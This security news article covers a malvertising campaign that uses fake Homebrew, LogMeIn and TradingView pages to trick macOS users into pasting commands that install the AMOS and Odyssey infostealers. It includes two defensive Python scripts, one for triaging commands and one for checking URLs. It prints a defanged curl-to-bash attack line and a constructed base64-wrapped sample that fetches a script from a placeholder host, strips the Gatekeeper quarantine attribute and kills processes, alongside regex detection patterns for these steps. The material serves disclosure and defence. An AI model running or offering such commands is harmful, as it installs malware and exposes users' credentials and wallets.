Malicious Google Ads Target macOS Developers with Fake Homebrew, LogMeIn Installers
#Security

LavX Team
2 min read

A malvertising campaign is using Google Ads to push fake Homebrew, LogMeIn, and TradingView sites that trick macOS developers into pasting terminal commands which infect their systems with the AMOS and Odyssey infostealers. Researchers identified over 85 malicious domains using 'ClickFix' techniques to sidestep macOS protections. The malware harvests credentials, cryptocurrency wallets, and other sensitive data while evading detection.

A dangerous malvertising campaign is specifically targeting macOS developers by impersonating trusted platforms like Homebrew, LogMeIn, and TradingView through Google Ads. Researchers at Hunt.io have uncovered over 85 malicious domains designed to distribute infostealers like AMOS (Atomic macOS Stealer) and Odyssey Stealer, marking a significant escalation in attacks against Apple's developer community.

The Attack Vector: ClickFix and Malicious Terminal Commands

The campaign uses 'ClickFix' techniques: victims land on fake download portals via Google Search ads, and the pages instruct them to copy a terminal command and run it themselves, disguised as an installation step or a 'security verification'. Because the victim types the command in their own terminal, the page never has to serve a file through the browser, so the usual download warnings are never shown:

```shell
# Example of malicious command (base64 decoded)
curl -sL hxxp://malicious-domain/install.sh | bash
```

Figure: Fake Homebrew installation page prompting terminal command execution (Source: Hunt.io)

When executed, these commands:

  1. Fetch and decode an 'install.sh' script
  2. Download the malware payload
  3. Strip the com.apple.quarantine extended attribute from it so Gatekeeper never assesses the file
  4. Kill processes such as OneDrive updaters to avoid detection
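The chain above can be triaged without running anything: peel off the base64 wrapper layer by layer and look for the tells (a remote script piped into a shell, a base64 decode stage, `xattr` clearing the quarantine attribute, process killing). The following is an added example written for this article, not code from Hunt.io or from the campaign; the domain brew-install.example, the file paths and the sample commands are constructed placeholders, not indicators from the real campaign.

```python
"""Static triage of a 'ClickFix' style paste-and-run command, without executing it.

Added example for this article, not code from Hunt.io or from the campaign it
describes. The sample commands are constructed: brew-install.example and the
paths are placeholders, not indicators from the real campaign.
"""
import base64
import binascii
import re

# Indicators matched against the raw command and every decoded base64 layer.
INDICATORS = {
    # `curl ... | bash` or `bash -c "$(curl ...)"`: a remote script runs unseen.
    "remote_script_to_shell": re.compile(
        r"\b(?:curl|wget)\b[^|;\n]*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b"
        r"|\b(?:ba|z)?sh\b[^\n]*\$\(\s*(?:curl|wget)\b"
    ),
    # An installer that must be base64-decoded before it runs is hiding what it does.
    "base64_decode_stage": re.compile(r"\bbase64\b\s+(?:-[dD]\b|--decode\b)"),
    # Clearing xattrs or deleting com.apple.quarantine is how Gatekeeper is sidestepped.
    "quarantine_attr_removed": re.compile(
        r"\bxattr\b[^;|&\n]*?(?:-c\b|-[a-z]*d[a-z]*\s+com\.apple\.quarantine)"
    ),
    "process_killed": re.compile(r"\b(?:pkill|killall|kill\s+-9)\b"),
    "sudo_used": re.compile(r"\bsudo\b"),
}

# Raw or defanged (hxxp) URLs, so the analyst sees where the payload is hosted.
URL_RE = re.compile(r"\bh(?:xx|tt)ps?://[^\s\"'|;)]+")
# A run of base64 alphabet long enough to be a wrapped command rather than a path.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def _decode_if_text(token: str):
    """Base64-decode one token; return it only if it is printable UTF-8 text."""
    try:
        text = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if all(c.isprintable() or c in "\n\t" for c in text) else None


def unwrap_layers(cmd: str, max_depth: int = 5) -> list:
    """Return the command followed by each successive base64-decoded layer."""
    layers = [cmd]
    for _ in range(max_depth):
        decoded = [t for t in map(_decode_if_text, B64_TOKEN.findall(layers[-1])) if t]
        if not decoded:
            break
        layers.append("\n".join(decoded))
    return layers


def triage(cmd: str) -> dict:
    """Classify a pasted command as benign / suspicious / malicious, with evidence."""
    layers = unwrap_layers(cmd)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    urls = sorted({u for layer in layers for u in URL_RE.findall(layer)})
    if "quarantine_attr_removed" in hits or (
        "base64_decode_stage" in hits and "remote_script_to_shell" in hits
    ):
        verdict = "malicious"
    elif hits:
        verdict = "suspicious"  # remote execution alone: verify the URL host first
    else:
        verdict = "benign"
    return {"verdict": verdict, "indicators": sorted(hits), "urls": urls, "layers": len(layers)}


# Constructed sample: the inner one-liner mimics the chain described in the article
# (fetch script, strip quarantine flag, kill a process), wrapped in base64.
_INNER = (
    "curl -sL hxxp://brew-install.example/install.sh | bash; "
    "xattr -d com.apple.quarantine /tmp/Installer.app; "
    "killall 'OneDrive Updater'"
)
SAMPLE_CLICKFIX = 'echo "%s" | base64 -D | bash' % base64.b64encode(_INNER.encode()).decode()

# Homebrew's genuine install one-liner (from brew.sh): also remote execution, so it is
# reported 'suspicious', which is exactly why the URL host must be checked separately.
OFFICIAL_BREW = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'

if __name__ == "__main__":
    for name, cmd in (("clickfix", SAMPLE_CLICKFIX), ("official", OFFICIAL_BREW), ("plain", "ls -la")):
        print(name, triage(cmd))
```

The genuine Homebrew one-liner is itself remote code execution and is deliberately reported as 'suspicious' rather than 'benign': pattern matching can tell you that a command runs a remote script, but only comparing the URL's host against what the project actually publishes tells you whether that is acceptable.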

Advanced Malware Payloads: AMOS and Odyssey

The payloads demonstrate alarming sophistication:

  • AMOS ($1,000/month MaaS subscription): Collects hardware fingerprints, browser data, crypto wallets, and Keychain items. Recently added persistent backdoor capabilities.
  • Odyssey Stealer (AMOS fork): Targets 100+ crypto extensions, compresses stolen data into ZIP files, and uses XPC services to blend with legitimate processes.

Figure: Fake TradingView site using a fake 'security confirmation' to deliver malware (Source: Hunt.io)

Why Developers Are Prime Targets

This campaign strategically exploits macOS developers' workflow:

  1. Trust in package managers: Homebrew's ubiquity makes it ideal for impersonation
  2. Sudo privileges: Developers routinely work in a terminal with sudo rights, so a pasted command can run with root privileges
  3. High-value assets: Development environments contain credentials, API keys, and proprietary code
  4. Google Ads legitimacy: Malicious sites gain credibility through paid search placement

The Bigger Picture: Supply Chain Implications

This isn't the first time Homebrew has been impersonated; threat actors consistently piggyback on trusted open-source tools. The Google Ads angle points to a worrying trend: attackers paying premium rates for placement in front of high-value targets. With AMOS sold as malware-as-a-service, such attacks will likely proliferate.

Protecting Your System

  • Never paste a terminal command from a web page you cannot read and explain; a base64 blob piped into a shell, or a 'verification' step that involves the terminal, is a red flag
  • Verify URLs before downloading developer tools, checking the exact hostname rather than whether a familiar name appears somewhere in the link
  • Install package managers only from their official sources (for Homebrew, the instructions at brew.sh)
  • Monitor for suspicious process termination (e.g., OneDrive updaters) and for removal of the com.apple.quarantine attribute
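Checking the exact hostname is where people slip, because a fake page can put a familiar name anywhere in the link (as a subdomain, in the path, or before an `@`). The following is an added example written for this article, not code from Homebrew or Hunt.io; the allowlist is an assumption a team would maintain for itself (Homebrew's installer is published from the Homebrew/install repository via raw.githubusercontent.com, and brew.sh is the project site), and the lookalike hosts cdn-example.net and installer.example are constructed.

```python
"""Vet the URLs inside a copied installer command against the hosts the tool really uses.

Added example for this article, not Homebrew's or Hunt.io's code. The allowlist is an
assumption a team would maintain itself; the lookalike domains in the samples
(cdn-example.net, installer.example) are constructed.
"""
import posixpath
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"\bhttps?://[^\s\"'|;)]+")

# Exact hostname -> allowed path prefixes. Matching the host exactly is the point:
# `"brew.sh" in url` would accept brew.sh.evil.example and https://brew.sh@evil.example/.
ALLOWED = {
    "homebrew": {
        "raw.githubusercontent.com": ["/Homebrew/install"],
        "github.com": ["/Homebrew"],
        "brew.sh": ["/"],
    },
}


def _under(path: str, prefix: str) -> bool:
    """True if path is the prefix itself or lies below it."""
    return prefix == "/" or path == prefix or path.startswith(prefix + "/")


def check_url(url: str, tool: str) -> list:
    """Return the reasons a URL fails the allowlist; an empty list means it passes."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()         # drops userinfo and port, lowercases
    path = posixpath.normpath(parts.path or "/")  # resolves /a/../b before the prefix test
    reasons = []
    if parts.scheme != "https":
        reasons.append("not https")
    prefixes = ALLOWED[tool].get(host)
    if prefixes is None:
        reasons.append(f"host {host!r} not in allowlist")
    elif not any(_under(path, p) for p in prefixes):
        reasons.append(f"path {path!r} outside allowed prefixes")
    return reasons


def vet_command(cmd: str, tool: str = "homebrew") -> dict:
    """Map each failing URL in cmd to its reasons; {} means every URL checked out."""
    findings = {}
    for url in URL_RE.findall(cmd):
        reasons = check_url(url, tool)
        if reasons:
            findings[url] = reasons
    return findings


# Homebrew's genuine install one-liner (from brew.sh).
OFFICIAL_BREW = '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"'
# Constructed lookalikes of the kind a fake download page would show.
LOOKALIKE_HOST = "curl -fsSL https://raw.githubusercontent.com.cdn-example.net/Homebrew/install/HEAD/install.sh | bash"
USERINFO_TRICK = "curl -fsSL https://brew.sh@installer.example/install.sh | bash"
PLAIN_HTTP = "curl -sL http://brew.sh/install.sh | bash"
TRAVERSAL = "curl -fsSL https://raw.githubusercontent.com/Homebrew/install/../../someone/fork/HEAD/install.sh | bash"

if __name__ == "__main__":
    samples = (("official", OFFICIAL_BREW), ("lookalike", LOOKALIKE_HOST),
               ("userinfo", USERINFO_TRICK), ("http", PLAIN_HTTP), ("traversal", TRAVERSAL))
    for name, cmd in samples:
        print(name, vet_command(cmd) or "ok")
```

`urlsplit().hostname` is what makes the `brew.sh@installer.example` case fail: the familiar name is userinfo, not the host, and a substring check would have waved it through.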

As infostealers evolve to bypass macOS security layers, developers must treat every installation step as a potential attack surface. This campaign proves that even Google's ad ecosystem can become a weapon against those building our software.
